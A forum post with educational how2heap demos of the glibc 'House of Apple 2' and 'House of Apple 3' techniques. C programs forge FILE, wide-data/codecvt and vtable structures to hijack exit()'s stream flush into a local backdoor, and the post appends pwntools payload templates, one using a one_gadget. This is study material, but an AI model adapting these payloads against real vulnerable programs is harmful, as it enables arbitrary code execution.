[自制]how2heap house of apple(2-3)

我写了几个house of apple的demo,供大家学习参考,欢迎批评指点。

House of apple2:

#include<unistd.h>
#include<stdlib.h>
#include<stdio.h>
int backdoor(){
	/* Final target of the hijacked vtable slot (see the chain printed by main).
	 * Prints its banner in red and returns 0 so the caller keeps unwinding. */
	static const char *const banner[] = {
		"\033[31m[!]backdoor is be called !\n",
		"\033[31m[!]program exiting!",
	};
	for (size_t i = 0; i < sizeof banner / sizeof banner[0]; i++) {
		fputs(banner[i], stdout);
	}
	return 0;
}
int main(){
	/* Demo driver. Builds a fake FILE, a fake _wide_data and a fake vtable on
	 * the heap, then overwrites libc's _IO_list_all so that the stream flush
	 * performed by exit() follows the chain printed at Step 3 into backdoor().
	 * The process patches its own libc; the only external input is the single
	 * keypress read before exit.
	 *
	 * NOTE(review): every libc offset below is hard-coded for one specific
	 * libc build (not identified on this page) and will be wrong on any other.
	 * NOTE(review): _IO_FILE and _IO_list_all are implementation-reserved
	 * identifiers (leading underscore + capital); renaming them avoids any
	 * collision with libc's own declarations. */
	setbuf(stdin,NULL);
	setbuf(stdout,NULL);//unbuffered stdout: every progress line is written immediately
	printf("init the programe\n");
	printf("-------------------------------how2heap house of apple 2---------------------------\n");
	printf("[*]first,you need to know the address of _IO_list_all,and modify it . make it point to our chunk\n");
	unsigned long offset_of_IO_list_all=0x21a680;//libc-build-specific (see note above)
	unsigned long offset_of_puts=0x80ed0;//libc-build-specific
	unsigned long _IO_wfile_jumps_offset=0x2160c0;//libc-build-specific
	printf("[*]The adrress of puts is %p\n",&puts);//NOTE(review): %p expects void *; cast the function pointer
	unsigned long libc_base=(unsigned long)&puts-offset_of_puts;//libc base derived from the resolved address of puts
	printf("[*]GNU Library base is %p\n",libc_base);//NOTE(review): %p with an unsigned long is UB; use %lx or cast to (void *)
	unsigned long *_IO_list_all=libc_base+offset_of_IO_list_all;//NOTE(review): integer assigned to a pointer without a cast
	printf("[*]_IO_list_all address is %p.\n",_IO_list_all);
	unsigned long _wfile_jumps = libc_base+_IO_wfile_jumps_offset;
	printf("[*]_wfile_jumps address is %p.\n",_wfile_jumps);//NOTE(review): %p with an unsigned long is UB
	unsigned long *_IO_FILE = malloc(0x400);//NOTE(review): malloc results are unchecked and not zeroed; slots not written below keep whatever the chunk held
	unsigned long *_wide_data = malloc(0x400);
	unsigned long *vtable = malloc(0x400);
	printf("[*]Step 1 : We malloc three chunks to store our data.\n[*]fake _IO_FILE address is %p\n[*]fake wide_data address is %p\n[*]fake vtable address is %p.\n",_IO_FILE,_wide_data,vtable);
	printf("[*]Step 2 : set data to fake struct\n");
	//Byte offsets into the fake objects, divided by 8 because the chunks are
	//addressed as unsigned long *. The trailing comment names the field each
	//slot stands for in the corresponding libc struct layout.
	*(_IO_FILE+0x0)=0x0;//flags
	*(_IO_FILE+0x20/8)=0x0;//_IO_write_base
	*(_IO_FILE+0x28/8)=0x1;//_IO_write_ptr
	*(_IO_FILE+0xa0/8)=_wide_data;//wide_data -- NOTE(review): pointer stored into an unsigned long slot without a cast
	*(_IO_FILE+0xc0/8)=0x1;//_mode
	*(_IO_FILE+0xd8/8)=_wfile_jumps;//vtable
	printf("[+]_IO_FILE modify ok!\n");
	*(_wide_data+0x18/8)=0x0;//_IO_write_base
	*(_wide_data+0x20/8)=0x1;//_IO_write_ptr
	*(_wide_data+0x30/8)=0x0;//_IO_buf_base
	*(_wide_data+0xe0/8)=vtable;//_IO_wfile_jumps -- NOTE(review): pointer stored without a cast
	printf("[+]_wide_data modify ok!\n");
	*(vtable+0x68/8)=&backdoor;//_IO_wallocate -- NOTE(review): function pointer stored into an integer slot without a cast
	printf("[+]vtable modify ok!\n");
	*(_IO_list_all) = _IO_FILE;//Step 3: libc's stream list now starts at the fake FILE -- NOTE(review): pointer stored without a cast
	printf("[+]Step 3 : _IO_list_all modify ok!\n[*]New _IO_list_all is point to : %p\n",*_IO_list_all);//NOTE(review): %p with an unsigned long is UB
	char a[1];//one-byte sink for the keypress below
	printf("[*]The control will fellow this chain : exit(0)->fflush()->_IO_flush_all()->_IO_OVERFLOW(modified)->_IO_wfile_OVERFLOW->_IO_wdoallocatebuf()->_IO_doallocate(modified)->backdoor\n");
	printf("[*]Press any key to continue , next step will ffush all stream . Then will execute our backdoor\n");
	read(0,a,1);//return value unchecked: EOF or an error on stdin also falls through to exit
	printf("Step 4 : execute exit(0); to execute backdoor\n");
	exit(0);//the stream flush run by exit() follows the chain printed above
	return 0;//not reached: exit() does not return
}
/*
	payload=p32(0)#flags
	payload=payload.ljust(0x20,b"\x00")#padding
	payload+=p64(0)#_IO_write_base
	payload+=p64(1)#_IO_write_ptr
	payload=payload.ljust(0xa0,b"\x00")#padding
	payload+=p64(_IO_wide_data)#_wide_data
	payload=payload.ljust(0xc0,b"\x00")#padding
	payload+=p64(1)#_mode
	payload=payload.ljust(0xd8,b"\x00")#padding
	payload+=p64(_IO_wfile_jumps)


	_wide_data=b""
	_wide_data=_wide_data.ljust(0x18,b"\x00")
	_wide_data+=p64(0)#IO_write_base
	_wide_data+=p64(1)#IO_write_ptr
	_wide_data=_wide_data.ljust(0x30,b"\x00")
	_wide_data+=p64(0)#_IO_buf_base
	_wide_data=_wide_data.ljust(0xe0,b"\x00")
	_wide_data+=p64(fake_vtable_addr)
	_vtable=b"\x00"*0x68+p64(one_gadget)

*/
//learn computer

House of apple3:

#include<unistd.h>
#include<stdlib.h>
#include<stdio.h>
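/* OFFSET(VAR, NUM): lvalue for the element at index NUM/8 from pointer VAR
 * (the byte offset NUM when VAR points to 8-byte elements; NUM is truncated
 * to a multiple of 8). Every argument and the whole expansion are
 * parenthesised so that an expression argument such as OFFSET(p, a + b)
 * groups as (a + b)/8 instead of a + b/8. */
#define OFFSET(VAR,NUM) (*((VAR)+(NUM)/8))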
int backdoor(){
	/* Final target of the hijacked codecvt call (see the chain printed by main).
	 * Prints its banner in red, then ends the process at once with _exit():
	 * no stdio flush and no atexit handlers, so the hijacked exit() path is
	 * never resumed. */
	static const char *const banner[] = {
		"\033[31m[!]backdoor is be called !\n",
		"\033[31m[!]program exiting!\n",
	};
	for (size_t i = 0; i < sizeof banner / sizeof banner[0]; i++) {
		fputs(banner[i], stdout);
	}
	_exit(0);
	return 0;//not reached: _exit() does not return
}
int main(){
	/* Demo driver for the codecvt variant. Builds a fake FILE, a fake _codecvt
	 * and a fake cd_in object on the heap, points the fake FILE's _wide_data at
	 * an address inside libc (commen_wide_data), and overwrites _IO_list_all so
	 * that the stream flush performed by exit() follows the chain printed at
	 * Step 3 into backdoor(). The process patches its own libc; the only
	 * external input is the single keypress read before exit.
	 *
	 * NOTE(review): every libc offset below is hard-coded for one specific
	 * libc build (not identified on this page) and will be wrong on any other.
	 * NOTE(review): _IO_FILE and _IO_list_all are implementation-reserved
	 * identifiers (leading underscore + capital); renaming them avoids any
	 * collision with libc's own declarations. */
	setbuf(stdin,NULL);
	setbuf(stdout,NULL);//unbuffered stdout: every progress line is written immediately
	printf("init the programe\n");
	printf("-------------------------------how2heap house of apple 3---------------------------\n");
	printf("[*]first,you need to know the address of _IO_list_all,and modify it . make it point to our chunk\n");
	unsigned long offset_of_IO_list_all=0x21a680;//libc-build-specific (see note above)
	unsigned long offset_of_puts=0x80ed0;//libc-build-specific
	unsigned long _IO_wfile_jumps_offset=0x2160c0;//libc-build-specific
	printf("[*]The adrress of puts is %p\n",&puts);//NOTE(review): %p expects void *; cast the function pointer
	unsigned long libc_base=(unsigned long)&puts-offset_of_puts;//libc base derived from the resolved address of puts
	printf("[*]GNU Library base is %p\n",libc_base);//NOTE(review): %p with an unsigned long is UB; use %lx or cast to (void *)
	unsigned long *_IO_list_all=libc_base+offset_of_IO_list_all;//NOTE(review): integer assigned to a pointer without a cast
	printf("[*]_IO_list_all address is %p.\n",_IO_list_all);
	unsigned long _wfile_jumps = libc_base+_IO_wfile_jumps_offset;
	printf("[*]_wfile_jumps address is %p.\n",_wfile_jumps);//NOTE(review): %p with an unsigned long is UB
	unsigned long commen_wide_data=0x219b80+libc_base;//libc-build-specific; "commen" reads as "common" wide data
	printf("[*]commen _wide_data address is %p.\n",commen_wide_data);//NOTE(review): %p with an unsigned long is UB
	unsigned long *_IO_FILE = malloc(0x400);//NOTE(review): malloc results are unchecked and not zeroed; slots not written below keep whatever the chunk held
	unsigned long *codecvt = malloc(0x400);
	unsigned long *cd_in = malloc(0x400);
	printf("[*]Step 1 : We calloc three chunks to store our data.\n[*]fake _IO_FILE address is %p\n[*]fake wide_data address is %p\n[*]cd_in address is %p.\n",_IO_FILE,codecvt,cd_in);//NOTE(review): message says calloc, but the chunks above come from malloc
	printf("[*]Step 2 : set data to fake struct\n");
	//OFFSET(p, n) writes the 8-byte slot at byte offset n; the trailing comment
	//names the field each slot stands for in the corresponding libc struct layout.
	OFFSET(_IO_FILE,0x8)=0;//_IO_read_ptr
	OFFSET(_IO_FILE,0x10)=1;//_IO_read_end
	OFFSET(_IO_FILE,0x28)=1;//_IO_write_ptr
	OFFSET(_IO_FILE,0x98)=codecvt;//codecvt -- NOTE(review): pointer stored into an unsigned long slot without a cast
	OFFSET(_IO_FILE,0xa0)=commen_wide_data;//commen wide data
	OFFSET(_IO_FILE,0xd8)=_wfile_jumps+0x8;//_IO_wfile_jumps shifted by 8 bytes; the chain printed at Step 3 shows the OVERFLOW slot then resolving to _IO_wfile_UNDERFLOW
	printf("[+]_IO_FILE modify ok!\n");
	OFFSET(codecvt,0)=cd_in;//cd_in -- NOTE(review): pointer stored without a cast
	printf("[+]codecvt modify ok!\n");
	OFFSET(cd_in,0)=0;//DECODE
	OFFSET(cd_in,0x28)=&backdoor;//backdoor -- NOTE(review): function pointer stored into an integer slot without a cast
	printf("[+]cd_in modify ok!\n");
	OFFSET(_IO_list_all,0)=_IO_FILE;//libc's stream list now starts at the fake FILE -- NOTE(review): pointer stored without a cast
	printf("[+]_IO_list_all modified ok!\n");
	printf("[*]Step 3 : Now when we exit , the control stream will fellow this chain : exit()->fflush()->_IO_flush_all()->_IO_OVERFLOW(modified)->_IO_wfile_UNDERFLOW->_libio_codecvt_in->DL_CALL_FCT->cd_in.fct(modified)->backdoor\n");
	char a[1];//one-byte sink for the keypress below
	printf("press any key to continue......\n");
	read(0,a,1);//return value unchecked: EOF or an error on stdin also falls through to exit
	exit(0);//the stream flush run by exit() follows the chain printed above
	return 0;//not reached: exit() does not return
}
/*
	_codecvt=b""
	_codecvt+=p64(fake__cd_in_addr)
	__cd_in=b""
	__cd_in+=p64(0)
	__cd_in=__cd_in.ljust(0x28,b"\x00")
	__cd_in+=p64(backdoor)
#house of apple 3
	payload=p64(0)#flags
	payload=payload.ljust(0x8,b"\x00")#padding
	payload+=p64(0)#_IO_read_ptr
	payload+=p64(1)#_IO_read_end
	payload=payload.ljust(0x20,b"\x00")#padding
	payload+=p64(0)#_IO_write_base
	payload+=p64(1)#_IO_write_ptr
	payload+=p64(0)#_IO_write_end
	payload=payload.ljust(0x98,b"\x00")#padding
	payload+=p64(_IO_codecvt_data)#_codecvt
	payload=payload.ljust(0xa0,b"\x00")#padding
	payload+=p64(commen_wide_data)#_wide_data
	payload=payload.ljust(0xc0,b"\x00")#padding
	payload+=p64(0)#_mode
	payload=payload.ljust(0xd8,b"\x00")#padding
	payload+=p64(_IO_wfile_jumps+0x8)#_vtable
	log_addr("_IO_wfile_jumps",_IO_wfile_jumps)

*/
//learn computer
